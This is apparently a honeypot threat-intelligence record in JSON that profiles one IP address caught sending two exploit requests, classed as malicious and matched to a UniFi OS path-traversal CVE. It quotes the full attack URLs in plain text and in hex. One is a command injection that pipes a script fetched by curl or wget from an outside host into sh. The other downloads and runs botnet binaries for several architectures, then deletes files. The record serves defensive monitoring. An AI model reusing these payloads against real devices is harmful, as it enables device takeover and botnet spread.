{"ip":"74.0.48.55","total_events":2,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"2 loader / command-injection payload(s)","confidence":"medium","network_type":null,"why":["2 request(s) carried a loader or command-injection payload (wget, curl, tftp, busybox, chmod or a known bot name).","This is the same evidence that puts an address in the public exploiter feed, so the feed and this page now agree.","Payload evidence stands on its own: one request that fetches a botnet binary is exploitation, not probing.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"991 bytes sent","bytes_sent":991,"session_seconds":0,"persistent":false}},"first_seen":"2026-08-09T11:46:49","last_seen":"2026-08-09T14:46:47","events_24h":0,"events_7d":2,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"North Brabant","city":"Eindhoven","lat":51.4466,"lon":5.4736,"asn":40662,"org":"Layer7 Technologies Inc"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2026-34908","title":"UniFi OS - Authentication Bypass via Path Traversal (..%2f)","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package"}],"malware":[],"top_ports":[{"port":11443,"proto":"tcp","label":"","count":1},{"port":6001,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":["t13i311000_e8f1e7e78f70_d41ae481755e"],"tls_ja3":["c12b4ccd5320bbb380ca1a9df90f771d"],"ja4h":["ge11nn07en_f8f3b1e8e10e","ge11nn0400_17292dadbc7b"]},"fingerprint_peers":{"t13i311000_e8f1e7e78f70_d41ae481755e":1016,"ge11nn07en_f8f3b1e8e10e":21,"ge11nn0400_17292dadbc7b":2828},"user_agents":["KrebsOnSecurity","Mozilla/5.0"],"timeline":[{"date":"2026-08-09","count":2}],"recent_events":[{"timestamp":"2026-08-09T14:46:47","port":11443,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"connection\":\"close\",\"host\":\"<HONEYPOT>\",\"user-agent\":\"Mozilla/5.0\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":[],"url_path":"/api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+curl+-s+http://95.155.151.113/unifi%7Csh%7C%7Cwget+-qO-+http://95.155.151.113/unifi%7Csh%7C%7Ccurl+-s+http://95.155.151.113/unifi+-o+/tmp/u%3bsh+/tmp/u%7C%7Cwget+-q+-O+/tmp/u+http://95.155.151.113/unifi%3bsh+/tmp/u+%3b","summary":"","payload_hex":"474554202f6170692f617574682f76616c69646174652d73736f2f2e2e2532662e2e2532662e2e25326670726f78792f75736572732f6170692f76322f7563732f7570646174652f6c61746573745f7061636b6167653f706b675f6e616d653d2533622b6375726c2b2d732b687474703a2f2f39352e3135352e3135312e3131332f756e6966692537437368253743253743776765742b2d714f2d2b687474703a2f2f39352e3135352e3135312e3131332f756e69666925374373682537432537436375726c2b2d732b687474703a2f2f39352e3135352e3135312e3131332f756e6966692b2d6f2b2f746d702f7525336273682b2f746d702f75253743253743776765742b2d712b2d4f2b2f746d702f752b687474703a2f2f39352e3135352e3135312e3131332f756e69666925336273682b2f746d702f752b25336220485454502f312e310d0a486f73743a20<HONEYPOT>0d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570743a202a2f2a0d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"Mozilla/5.0","ja3":"c12b4ccd5320bbb380ca1a9df90f771d","session":"8230dce0-9348-43ab-8fa2-e0179608078f","seq":1,"duration_ms":106,"bytes_in":410,"bytes_out":75},{"timestamp":"2026-08-09T11:46:49","port":6001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\"accept-encoding\":\"gzip, deflate\",\"accept-language\":\"en-US,en;q=0.9\",\"cache-control\":\"max-age=0\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:6001\",\"user-agent\":\"KrebsOnSecurity\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/shell?cd+/tmp;rm+m+ml+arm+arm7;wget+http:/\\/95.155.151.113/mips+-O+m;chmod+777+m;./m+routerip;wget+http:/\\/95.155.151.113/mpsl+-O+ml;chmod+777+ml;./ml+routerip;wget+http:/\\/95.155.151.113/arm7+-O+arm7;chmod+777+arm7;./arm7+routerip;wget+http:/\\/95.155.151.113/arm+-O+arm;chmod+777+arm;./arm+routerip;rm+-rf+*","summary":"","payload_hex":"474554202f7368656c6c3f63642b2f746d703b726d2b6d2b6d6c2b61726d2b61726d373b776765742b687474703a2f5c2f39352e3135352e3135312e3131332f6d6970732b2d4f2b6d3b63686d6f642b3737372b6d3b2e2f6d2b726f7574657269703b776765742b687474703a2f5c2f39352e3135352e3135312e3131332f6d70736c2b2d4f2b6d6c3b63686d6f642b3737372b6d6c3b2e2f6d6c2b726f7574657269703b776765742b687474703a2f5c2f39352e3135352e3135312e3131332f61726d372b2d4f2b61726d373b63686d6f642b3737372b61726d373b2e2f61726d372b726f7574657269703b776765742b687474703a2f5c2f39352e3135352e3135312e3131332f61726d2b2d4f2b61726d3b63686d6f642b3737372b61726d3b2e2f61726d2b726f7574657269703b726d2b2d72662b2a20485454502f312e310d0a486f73743a20<HONEYPOT>3a363030310d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a43616368652d436f6e74726f6c3a206d61782d6167653d300d0a557365722d4167656e743a204b726562734f6e53656375726974790d0a4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e380d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a0d0a","method":"GET","user_agent":"KrebsOnSecurity","ja3":"","session":"20e10624-de46-4bec-a607-32cb9ad8395a","seq":1,"duration_ms":100,"bytes_in":581,"bytes_out":75}],"http_methods":[{"method":"GET","count":2}],"distinct_ports_total":2,"top_paths":[{"path":"/api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+curl+-s+http://95.155.151.113/unifi%7Csh%7C%7Cwget+-qO-+http://95.155.151.113/unifi%7Csh%7C%7Ccurl+-s+http://95.155.151.113/unifi+-o+/tmp/u%3bsh+/tmp/u%7C%7Cwget+-q+-O+/tmp/u+http://95.155.151.113/unifi%3bsh+/tmp/u+%3b","count":1,"ports":1},{"path":"/shell?cd+/tmp;rm+m+ml+arm+arm7;wget+http:/\\/95.155.151.113/mips+-O+m;chmod+777+m;./m+routerip;wget+http:/\\/95.155.151.113/mpsl+-O+ml;chmod+777+ml;./ml+routerip;wget+http:/\\/95.155.151.113/arm7+-O+arm7;chmod+777+arm7;./arm7+routerip;wget+http:/\\/95.155.151.113/arm+-O+arm;chmod+777+arm;./arm+routerip;rm+-rf+*","count":1,"ports":1}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Accept-Language","Cache-Control","Connection","Host","User-Agent"],"representative":[{"name":"Accept","value":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Accept-Language","value":"en-US,en;q=0.9","notable":false},{"name":"Cache-Control","value":"max-age=0","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Host","value":"<HONEYPOT>:6001","notable":false},{"name":"User-Agent","value":"KrebsOnSecurity","notable":false}],"distinct_sets":2,"events_with_headers":2},"tags":[{"tag_id":"CVE-2026-34908","tag_type":"cve","title":"UniFi OS - Authentication Bypass via Path Traversal (..%2f)","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package","reference_urls":["https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34908","https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis","https://nvd.nist.gov/vuln/detail/CVE-2026-34908"]}],"data_as_of":"2026-08-14T16:13:01.330187+00:00"}